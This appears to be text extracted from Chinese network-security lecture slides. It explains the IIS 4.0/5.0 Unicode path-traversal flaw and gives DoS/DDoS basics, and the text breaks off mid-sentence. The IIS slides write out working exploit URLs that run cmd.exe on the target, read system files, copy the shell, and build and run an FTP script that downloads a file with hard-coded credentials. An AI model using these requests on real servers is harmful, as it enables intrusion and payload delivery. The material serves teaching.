《工学网络攻击》课件.pptVIP

系统漏洞和后门系统漏洞是程序中无意造成的缺陷，它形成了一个不被注意的通道。漏洞也指无意的配置错误，如使用默认服务器配置。后门是一个在操作系统或程序中无证明文件的通道，通常是由软件开发人员故意放置在那里的，以便他们能够快速对产品进行支持。1-

IISUNICODE漏洞NSFOCUS安全小组发现IIS4.0和IIS5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。2-

IISUNICODE漏洞对于IIS5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如%c1%hh或者%c0%hh,它会首先将其解码变成:0xc10xhh，然后尝试打开这个文件，Windows系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果0x00=%hh0x40的话，采用的解码的格式与下面的格式类似：

%c1%hh-(0xc1-0xc0)*0x40+0xhh

%c0%hh-(0xc0-0xc0)*0x40+0xhh3-

IISUNICODE漏洞因此，利用这种编码，我们可以构造很多字符，例如:

%c1%1c-(0xc1-0xc0)*0x40+0x1c=0x5c=‘/‘

%c0%2f-(0xc0-0xc0)*0x40+0x2f=0x2f=‘‘

攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。4-

IISUNICODE漏洞如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容：http://目标主机/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir利用这个漏洞查看系统文件内容也是可能的：

http://目标主机/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

5-

IIS漏洞/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe/scripts/ccc.exe?/c+echo+open+getfile/scripts/ccc.exe?/c+type+getfile6-

/scripts/ccc.exe?/c+echo+11+getfile/scripts/ccc.exe?/c+echo+administrator+getfile/scripts/ccc.exe?/c+echo+123456+getfile/scripts/ccc.exe?/c+echo+get+synful+getfile7-

/scripts/ccc.exe?/c+echo+quit+getfile/scripts/ccc.exe?/c+ftp+-s:getfile8-

拒绝服务攻击DoS（DenialofService），其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。9-

拒绝服务攻击带宽攻击指以极大的通信量冲击网络，使得所有可用网络资源都被消耗殆尽，最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机，使得所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求10-

分布式拒绝服务攻击(DDoS,DistributedDenialofService)指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS攻击，从而成倍地提高拒绝服务攻击的威力。11-

分布式拒绝服务攻击DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的，当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高时，它的效果是明显的。12-

分布式拒绝服务攻击随着计算机与网络技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络，这使得DoS攻击的困难程度加大了——目标对恶意攻击包的消化能力加强了不少，例如你的攻击软件每秒钟可以发送3,000个攻击包，但我的主机与网络带宽每秒钟可以处理10,000个攻击包，这样一来攻击就不会产生什么效果。13-

分布式拒绝服务攻击高速广泛连接的网络给大家